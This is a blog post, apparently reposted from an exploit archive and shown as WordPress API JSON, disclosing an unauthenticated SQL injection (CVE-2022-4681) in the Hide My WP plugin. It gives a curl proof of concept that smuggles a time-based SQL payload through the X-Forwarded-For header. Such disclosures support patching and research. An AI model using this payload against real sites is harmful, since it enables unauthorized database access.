{"id":55291,"date":"2024-03-11T18:59:52","date_gmt":"2024-03-11T15:59:52","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/177519\/wphidemywp-sql.txt"},"modified":"2024-03-12T11:08:18","modified_gmt":"2024-03-12T07:38:18","slug":"wordpress-hide-my-wp-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/wordpress-hide-my-wp-sql-injection\/","title":{"rendered":"WordPress Hide My WP SQL Injection"},"content":{"rendered":"<pre><code># Exploit Title: WordPress Plugin Hide My WP &lt; 6.2.9 - Unauthenticated SQLi\r\n# Publication Date: 2023-01-11\r\n# Original Researcher: Xenofon Vassilakopoulos\r\n# Exploit Author: Xenofon Vassilakopoulos\r\n# Submitter: Xenofon Vassilakopoulos\r\n# Vendor Homepage: https:\/\/wpwave.com\/\r\n# Version: Hide My WP v6.2.8 and prior\r\n# Tested on: Hide My WP v6.2.7\r\n# Impact: Database Access\r\n# CVE: CVE-2022-4681\r\n# CWE: CWE-89\r\n# CVSS Score: 8.6 (high)<\/code><\/pre>\n<p>## Description<\/p>\n<p>The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.<\/p>\n<p>## Proof of Concept<\/p>\n<pre><code>curl -k --location --request GET &quot;http:\/\/localhost:10008&quot; --header &quot;X-Forwarded-For: 127.0.0.1'+(select*from(select(sleep(20)))a)+'&quot;<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: WordPress Plugin Hide My WP &lt; 6.2.9 &#8211; Unauthenticated SQLi # Publication Date: 2023-01-11 # Original Researcher: Xenofon Vassilakopoulos # Exploit Author: Xenofon Vassilakopoulos # Submitter: Xenofon Vassilakopoulos # Vendor Homepage: https:\/\/wpwave.com\/ # Version: Hide My WP v6.2.8 and prior # Tested on: Hide My WP v6.2.7 # Impact: Database Access # 
&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-55291","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55291","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=55291"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55291\/revisions"}],"predecessor-version":[{"id":55316,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55291\/revisions\/55316"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=55291"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=55291"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=55291"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}